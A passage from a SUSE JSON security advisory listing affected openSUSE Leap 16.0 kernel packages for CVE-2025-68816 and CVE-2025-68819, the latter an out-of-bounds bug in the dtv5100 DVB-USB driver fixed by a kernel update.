"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68816"
},
{
"cve": "CVE-2025-68819",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68819"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: dvb-usb: dtv5100: fix out-of-bounds in dtv5100_i2c_msg()\n\nrlen value is a user-controlled value, but dtv5100_i2c_msg() does not\ncheck the size of the rlen value. Therefore, if it is set to a value\nlarger than sizeof(st-\u003edata), an out-of-bounds vuln occurs for st-\u003edata.\n\nTherefore, we need to add proper range checking to prevent this vuln.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68819",
"url": "https://www.suse.com/security/cve/CVE-2025-68819"
},
{
"category": "external",
"summary": "SUSE Bug 1256664 for CVE-2025-68819",
"url": "https://bugzilla.suse.com/1256664"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
